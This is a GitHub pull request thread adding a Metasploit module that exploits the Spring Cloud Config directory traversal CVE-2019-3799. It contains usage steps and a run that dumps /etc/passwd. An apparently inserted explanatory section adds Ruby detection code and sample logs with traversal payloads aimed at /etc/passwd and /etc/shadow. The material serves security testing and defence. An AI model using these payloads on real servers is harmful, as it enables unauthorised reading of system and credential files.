(CVE-2019-3799) Directory traversal - spring-cloud-config-server #11745

Merged
merged 9 commits into from Apr 26, 2019

5 participants
@RootUp (Contributor) commented Apr 18, 2019

This module exploits an unauthenticated directory traversal vulnerability
which exists in Spring Cloud Config, versions 2.1.x prior to 2.1.2,
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which
listens by default on port 8888.

Verification

1. Start msfconsole
2. use auxiliary/scanner/http/springcloud_traversal
3. set RHOSTS
4. run

Reference:
https://pivotal.io/security/cve-2019-3799
https://twitter.com/chybeta/status/1118370858974760963

bcoles and others added some commits Apr 18, 2019

Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
@bcoles (Contributor) commented Apr 18, 2019

@msjenkins-r7 test this please

bcoles added docs and removed needs-docs labels Apr 18, 2019

@RootUp (Contributor, Author) commented Apr 18, 2019

Tested on Ubuntu 16.04 LTS with spring-cloud v2.1.1.

msf > use auxiliary/scanner/http/springcloud_traversal 
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
RHOSTS => 192.168.1.132
msf auxiliary(scanner/http/springcloud_traversal) > set VERBOSE true 
VERBOSE => true
msf auxiliary(scanner/http/springcloud_traversal) > run

[+] 192.168.1.132:8888 - root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
.....
[+] File saved in: /home/input0/.msf4/loot/20190418203824_default_192.168.1.132_springcloud.trav_350250.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/springcloud_traversal) > 
@jhart-r7 (Contributor) commented Apr 18, 2019

FWIW, I checked the most recent Sonar HTTP study for 8888/TCP and identified ~3300 instances of Spring Cloud Config listening. This does not imply that they are vulnerable but may be useful context.


    res = send_request_raw({
      'method' => 'GET',
      'uri' => "/foo/default/master/#{traversal}"
    })

@bcoles (Contributor) Apr 18, 2019

Is foo important? Can it be randomized?

@jhart-r7 (Contributor) Apr 18, 2019

I don't believe either of the first two parts of the path matter. In my testing these can be anything.

@RootUp (Author, Contributor) Apr 18, 2019

I found it to be default after the installation.
https://github.com/spring-cloud/spring-cloud-config#QuickStart

@jhart-r7 (Contributor) Apr 18, 2019

I tested with docker run -it -p 8888:8888 -e SPRING_CLOUD_CONFIG_SERVER_GIT_URI=https://github.com/spring-cloud-samples/config-repo hyness/spring-cloud-config-server:2.1.1.RELEASE. The second part is the profile, which does default to default in my testing too, but its value does not seem to matter. That could be a side effect of how I'm testing.
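The thread above establishes the request shape the module sends (an arbitrary name and profile, a git ref as the label, and the traversal in the trailing path segment of /{name}/{profile}/{label}/{path}) and the verification output shows what success looks like (an /etc/passwd body saved as loot). The following Ruby is an added example, not the springcloud_traversal module's code and not anything from the Spring Cloud project: it builds that URI, applies the kind of loot check a scanner needs, and runs a defender-side detection over a few constructed access-log lines. The encoded traversal payloads in the sample log are assumed generic variants for illustration, not a claim about the exact payload the module uses, and the passwd regex is this example's own choice.

```ruby
#!/usr/bin/env ruby
# Added example, not the Metasploit module's code. It shows (1) the request
# shape the reviewers discuss, (2) a loot check matching what the module's
# output looks like, and (3) a defender-side detection over constructed
# access-log lines. The encoded traversal payloads in SAMPLE_LOG are assumed
# generic variants, not a claim about what springcloud_traversal sends.

# Spring Cloud Config serves repository files at /{name}/{profile}/{label}/{path};
# per the thread, name and profile can be arbitrary and label is a git ref.
def config_resource_uri(path, name: 'foo', profile: 'default', label: 'master')
  "/#{name}/#{profile}/#{label}/#{path}"
end

# Minimal percent-decoder (does not turn '+' into a space, unlike CGI.unescape).
def percent_decode(s)
  s.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Decode until stable so single- and double-encoded "..%2F" / "..%252F"
# sequences both collapse to "../" before inspection.
def fully_decode(path, max_rounds: 3)
  max_rounds.times do
    decoded = percent_decode(path)
    return decoded if decoded == path
    path = decoded
  end
  path
end

RESOURCE_PATH_RE = %r{\A/[^/]+/[^/]+/[^/]+/(.+)\z}

# True when the request targets the resource endpoint and the trailing path
# contains a ".." segment after decoding (forward or back slashes).
def traversal_request?(request_path)
  m = RESOURCE_PATH_RE.match(fully_decode(request_path))
  return false unless m
  m[1].split(%r{[\\/]}).include?('..')
end

# What the module's loot shows: a response body that starts like /etc/passwd.
# The regex tolerates a non-"x" password field (e.g. "*" on BSD-style systems).
def looks_like_passwd?(body)
  !!(body =~ /^root:[^:]*:0:0:/)
end

# Combined-log-format line -> hash (nil if the line does not parse).
ACCESS_LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) (?<bytes>\S+)/

def parse_access_line(line)
  m = ACCESS_LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Return the parsed records whose request path is a traversal attempt.
def flag_traversal(lines)
  lines.map { |l| parse_access_line(l) }.compact.select { |r| traversal_request?(r[:path]) }
end

# Constructed sample log: two traversal attempts (one double-encoded, one
# plain), one legitimate config fetch, one unrelated actuator request.
SAMPLE_LOG = <<~LOG
  192.168.1.50 - - [18/Apr/2019:20:38:24 +0000] "GET /foo/default/master/..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1432
  192.168.1.51 - - [18/Apr/2019:20:39:01 +0000] "GET /myapp/default/master/application.yml HTTP/1.1" 200 512
  192.168.1.52 - - [18/Apr/2019:20:39:17 +0000] "GET /foo/prod/develop/../../../../etc/shadow HTTP/1.1" 403 0
  192.168.1.53 - - [18/Apr/2019:20:40:02 +0000] "GET /actuator/health HTTP/1.1" 200 15
LOG

if __FILE__ == $PROGRAM_NAME
  puts "probe URI: #{config_resource_uri('README.md')}"
  flag_traversal(SAMPLE_LOG.lines).each do |r|
    puts "[!] #{r[:ip]} #{r[:method]} #{r[:path]} -> #{r[:status]}"
  end
end
```

Decoding before segment inspection matters because a single-pass decoder sees `..%252F` as a harmless literal; the detection also keys on the four-segment resource path rather than on `..` anywhere, so ordinary Spring Boot endpoints such as /actuator/health do not produce noise. A 200 on a flagged request is the signal that the traversal actually returned content, which is exactly the case the module records as loot.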

@bcoles (Contributor) commented Apr 18, 2019

> FWIW, I checked the most recent Sonar HTTP study for 8888/TCP and identified ~3300 instances of Spring Cloud Config listening. This does not imply that they are vulnerable but may be useful context.

For comparison:

These imply Spring, but may not imply Spring Cloud Config.

jrobles-r7 self-assigned this Apr 24, 2019

RootUp and others added some commits Apr 24, 2019

Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
@RootUp (Contributor, Author) commented Apr 24, 2019

Thank you @jrobles-r7 I've made the necessary changes.

jrobles-r7 added some commits Apr 26, 2019

jrobles-r7 merged commit 306b0fd into rapid7:master Apr 26, 2019

3 checks passed

- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Apr 26, 2019

@jrobles-r7 (Contributor) commented Apr 26, 2019

Release Notes

The springcloud_traversal scanner module has been added to the framework. This module can be used to download files from Spring Cloud Config servers that are vulnerable to directory traversal.

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2019
